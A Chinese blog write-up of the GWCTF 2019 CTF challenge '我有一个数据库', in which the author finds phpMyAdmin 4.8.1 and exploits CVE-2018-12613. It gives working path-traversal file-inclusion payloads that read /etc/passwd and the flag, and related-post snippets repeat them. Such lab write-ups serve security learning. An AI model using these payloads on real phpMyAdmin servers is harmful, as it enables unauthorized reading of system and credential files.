[GWCTF 2019]我有一个数据库 WP

最新推荐文章于 2024-01-31 18:28:18 发布
最新推荐文章于 2024-01-31 18:28:18 发布
阅读量892 收藏
点赞数
分类专栏: CTf-wp 漏洞复现 文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52599204/article/details/126173014
版权

打开环境访问看到

1659666718101.png

提示我有一个数据库,但里面什么都没有,于是拿dirsearch跑了一下,没有出结果
但是有数据库嘛,那么试试常见的几个加上phpmyadmin 试试

1659666767372.png

于是看到了版本是4.8.1 拿到信息
百度一下 phpmyadmin4.8.1 漏洞
看到最多的是文件包含漏洞 编号 CVE-2018-12613

1659666788840.png

那么思路肯定就是复现漏洞了,于是开始找 poc 然后直接开打
构造payload

index.php?target=db_datadict.php%253f../../../../../../etc/passwd

发现回显
1659666237794.png

最后的payload

index.php?target=db_datadict.php%253f../../../../../../flag

得到flag
1659666539921.png

A_snail!
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[GWCTF 2019]我有一个数据库(文件包含漏洞)
weixin_44110537的博客
10-03 408
一堆乱码,什么都没有. 查看源代码也没有什么隐藏信息. 于是dirsearch扫描一下,发现 有个数据库登入页面. 发现不用登录直接就可以进去了. 但是发现这里面什么都没有. cve-2018-12613-PhpMyadmin后台文件包含 这个漏洞出现在index.php中的 // If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) && is_st.
[GWCTF 2019]我有一个数据库 wp
m0_55185160的博客
04-23 4351
得到了/phpmyadmin/路径,加上题目是我有一个数据库,于是想到应该本题就是和phpmyadmin数据库有关 我们可以看到phpmyadmin的版本为4.8.1,搜索后发现这个版本的phpmyadmin存在漏洞CVE-2018-12613,下面我们复现一下漏洞。 首先分析一下源码: index.php 关于target的部分 $target_blacklist = array ( 'imp..
[GWCTF 2019]我有一个数据库&&getshell
plant1234的博客
03-24 2758
BUU我有一个数据库&&getsholl 做这题的话目的是为了复现 phpMyadmin(CVE-2018-12613)后台任意文件包含漏洞 这题的话打开看是乱码,但查看响应还是有东西的: 多的不说先信息收集一波,直接扫目录,看页面有没有有用的信息 然后。 日常访问有没有:robots.txt 得到: 在发现有phpinfo.php 访问得到: 得到了后端脚本语言php的一些信息 扫描得到: 扫描发现有:phpmyadmin/ 直接访问得到: 发现没有要登陆省去了很多的步骤 尝试用
[GWCTF 2019]我有一个数据库
siu~
09-15 166
[GWCTF 2019]我有一个数据库 解题
[GWCTF 2019]我有一个数据库(特详解)
最新发布
qq_74806534的博客
01-31 1万+
记下来就是利用文章里的payload了,这里../回到上一级目录,只要多于5个,能回到根目录就行,etc/passwd是linux存放用户和密码的文件,在根目录。页面一开始乱码,先教大家应该修复的方法,到火狐打开,然后找到小工具里的修复文字编码,就可以了(没有的话可以在定制工具栏里添加)在界面可以查到各服务器的版本,可以去百度各版本服务器的漏洞。他说什么都没有,先dirsearch扫一下。直接看上面那个师傅的文章,十分详细的。查看其他的吧,有个数据库看看去。这里就不一样查了,直接上结论。
一个合适wp新手的企业主题
07-02
【标题】"一个合适wp新手的企业主题"所指的是在WordPress平台上专为初学者设计的一款企业网站模板。WordPress,简称WP,是全球最受欢迎的开源内容管理系统(CMS),它提供了丰富的主题和插件,使得用户无需深入编程...
实现支持本地数据库源码WP7
04-02
该源码实现支持本地数据库源码WP7,源码可以实现将 LINQ用于SQL以将相关数据存储在本地数据库中,从而驻留在应用程序的独立存储容器中,该例子使用多表本地数据库的待办事项列,表应用程序,可以从本地数据库中添加...
经典的第一个WP7实例代码
12-04
【标题】"经典的第一个WP7实例代码"涉及的是Windows Phone 7(WP7)平台的开发,这是一个微软为智能手机设计的操作系统。这个实例代码是针对初学者,旨在帮助他们理解和入门WP7应用开发。 【描述】提到的学习过程,...
Renesas 两个功率MOSFET的HAT2210WP
01-20
瑞萨科技公司(Renesas)宣布推出具有两个功率MOSFET的HAT2210WP,封装形式是WPAK (瑞萨科技的封装代码)*1高热辐射封装,尺寸仅有5.3 × 6.1 × 0.8 mm (),用于笔记本电脑、通信设备及类似产品的DC-DC变换器中。...
WP8 本地数据库应用的实例
12-11
1. **设置项目和添加数据库**:打开Visual Studio Ultimate 2012,创建一个新的WP8项目。接着,通过右键点击“解决方案资源管理器”中的“数据”文件夹,选择“添加新项”。在弹出的对话框中,选择“SQL Server ...
BUU刷题--[GWCTF 2019]我有一个数据库
weixin_48631429的博客
12-02 553
我有一个数据库 打开看到这样一堆文字,读不懂,也没有其他的信息。 怎么想也想不到该怎么做,buu还不能扫描。所以只能看了wp,看到有一个/phpmyadmin,回来开始想怎么做 phpmyadmin版本信息4.8.1,搜索一下有什么漏洞。 任意文件包含:那么我们就可以利用来读flag ?target=db_datadict.php%253f/../../../../../../../../../flag 拿到flag 考点就是CVE-2018-12613 ...
[GWCTF 2019]我有一个数据库(CVE-2018-12613)
记录学习,一起进步
01-29 274
[GWCTF 2019]我有一个数据库(CVE-2018-12613)
buuctf-[[GWCTF 2019]我有一个数据库(小宇特详解)
小宇的web博客
02-12 594
buuctf-[[GWCTF 2019]我有一个数据库(小宇特详解) 这里不知道什么原因显示的乱码 直接使用dirsearch对网站进行扫描吧 这里扫到了phpmyadmin目录,无密码直接登录成功。 这里给出了版本号MySQL数据库Version 4.8.1。 这个版本有文件包含漏洞 漏洞原理是 利用/使db_datadict.php?成为一个不存在目录,利用include函数的目录不断跳转尝试得到flag目录。 payload phpmyadmin/index.php?target=db_datadi
[GWCTF 2019]我有一个数据库 1
shinygod的博客
03-05 1402
知识点:phpmyadmin 扫描 什么都没有,御剑扫一下 进phpmyadmin看看 直接对着版本信息上网查版本漏洞 phpmyadmin 例如传入 ?target=db_datadict.php%253f 由于服务器会自动解码一次,所以在checkPageValidity()中,$page的值一开始会是db_datadict.php%3f,又一次url解码后变成了db_datadict.php?,这次便符合了?前内容在白名单的要求,函数返回true 但在index.php中$_REQUEST[‘t
"WP个人信息发布平台数据库设计及管理功能
WP是一款个人博客系统,注重美学、易用性和网络标准的个人信息发布平台。它逐步演化成一款内容管理系统软件,使用PHP语言和MySQL数据库开发。用户可以在支持PHP和MySQL数据库的服务器上使用自己的博客。该系统的主要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值